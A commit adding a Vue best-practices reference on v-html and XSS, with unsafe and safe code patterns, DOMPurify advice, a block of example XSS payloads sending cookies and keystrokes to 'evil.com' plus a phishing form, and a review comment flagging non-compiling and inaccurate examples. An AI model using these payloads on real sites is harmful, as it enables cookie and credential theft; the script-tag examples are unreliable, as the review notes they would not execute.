feat: Complete fleet — 94 skills across 10+ domains
Pulled ALL skills from 15 source repositories:
- anthropics/skills: 16 (docs, design, MCP, testing)
- obra/superpowers: 14 (TDD, debugging, agents, planning)
- coreyhaines31/marketingskills: 25 (marketing, CRO, SEO, growth)
- better-auth/skills: 5 (auth patterns)
- vercel-labs/agent-skills: 5 (React, design, Vercel)
- antfu/skills: 16 (Vue, Vite, Vitest, pnpm, Turborepo)
- Plus 13 individual skills from various repos

Mosaic Stack is not limited to coding — the Orchestrator and subagents serve coding, business, design, marketing, writing, logistics, analysis, and more.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
111
skills/vue-best-practices/reference/v-html-xss-security.md
Normal file
@@ -0,0 +1,111 @@
---
title: Never Use v-html with User-Provided Content
impact: HIGH
impactDescription: Using v-html with untrusted content leads to XSS vulnerabilities
type: capability
tags: [vue3, security, xss, v-html, template]
---

# Never Use v-html with User-Provided Content

**Impact: HIGH** - Dynamically rendering arbitrary HTML with `v-html` can lead to Cross-Site Scripting (XSS) vulnerabilities. Attackers can inject malicious scripts that execute in users' browsers, stealing credentials or performing actions on their behalf.

The `v-html` directive renders raw HTML without sanitization. While useful for trusted content, it bypasses Vue's automatic text escaping and should never be used with user input.

## Task Checklist

- [ ] Never use `v-html` with user-provided content
- [ ] Prefer text interpolation `{{ }}` which automatically escapes HTML
- [ ] Use components for template composition instead of `v-html`
- [ ] If raw HTML is absolutely needed, sanitize it with a library like DOMPurify
- [ ] Audit existing `v-html` usage for potential XSS vectors

**Incorrect:**
```vue
<template>
<!-- DANGEROUS: User input rendered as HTML -->
<div v-html="userComment"></div>

<!-- DANGEROUS: Content from API without sanitization -->
<article v-html="articleContent"></article>

<!-- DANGEROUS: URL parameters or form inputs -->
<p v-html="searchQuery"></p>
</template>

<script setup>
import { ref } from 'vue'

// This could contain: <script>document.location='https://evil.com/steal?cookie='+document.cookie</script>
const userComment = ref(props.comment)
</script>
```

**Correct:**
```vue
<template>
<!-- SAFE: Text interpolation escapes HTML -->
<div>{{ userComment }}</div>

<!-- SAFE: Use components for rich content -->
<CommentRenderer :content="userComment" />

<!-- SAFE: Only use v-html with trusted, sanitized content -->
<div v-html="sanitizedContent"></div>
</template>

<script setup>
import { computed } from 'vue'
import DOMPurify from 'dompurify'

const props = defineProps(['comment', 'trustedHtml'])

// Option 1: Use text interpolation (recommended)
const userComment = computed(() => props.comment)

// Option 2: Sanitize if raw HTML is truly needed
const sanitizedContent = computed(() =>
DOMPurify.sanitize(props.trustedHtml)
)
</script>
```

## When v-html Is Acceptable

```vue
<template>
<!-- OK: Static HTML from your own codebase -->
<div v-html="staticLegalDisclaimer"></div>

<!-- OK: Content from trusted CMS with sanitization -->
<article v-html="sanitizedCmsContent"></article>
</template>

<script setup>
// Content you control, not user input
const staticLegalDisclaimer = `
<p>Terms and conditions apply.</p>
<a href="/legal">Read more</a>
`
</script>
```

## XSS Attack Examples

Attackers can inject various payloads:
```html
<!-- Cookie theft -->
<img src="x" onerror="fetch('https://evil.com?c='+document.cookie)">

<!-- Keylogging -->
<script>document.onkeypress=function(e){fetch('https://evil.com?k='+e.key)}</script>

<!-- Phishing overlay -->
<div style="position:fixed;top:0;left:0;width:100%;height:100%">
<form action="https://evil.com/steal">Login required...</form>
</div>
```

## Reference
- [Vue.js Template Syntax - Raw HTML](https://vuejs.org/guide/essentials/template-syntax.html#raw-html)
- [OWASP XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)
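Review bot: the "Incorrect" example's `<script setup>` block will not compile as written: it reads `props.comment` without ever calling `defineProps`, and the comment on the preceding line contains a literal `</script>`, which the SFC parser treats as the end of the script block. Add `const props = defineProps(['comment'])` and write the closing tag in the comment as `<\/script>` (or split it) so a reader who copies the block gets a working starting point. A related accuracy problem: a `<script>` element inserted through `v-html` (which assigns `innerHTML`) is not executed by browsers, so the `<script>`-based payloads in the "This could contain" comment and in the "Keylogging" example under "XSS Attack Examples" misstate the risk and could lead a reader to believe that stripping `<script>` tags is an adequate defence; the executing vector is inline event-handler attributes such as the `onerror` example already in the file, and the text should say so, keeping the DOMPurify recommendation as the actual fix. Finally, two examples are not self-contained: in "When v-html Is Acceptable", `sanitizedCmsContent` is bound in the template but never defined in the script, and in the "Correct" block `CommentRenderer` is used without an import; add the missing definitions (a `computed` that runs `DOMPurify.sanitize` over the CMS content, and the component import) so each block stands on its own.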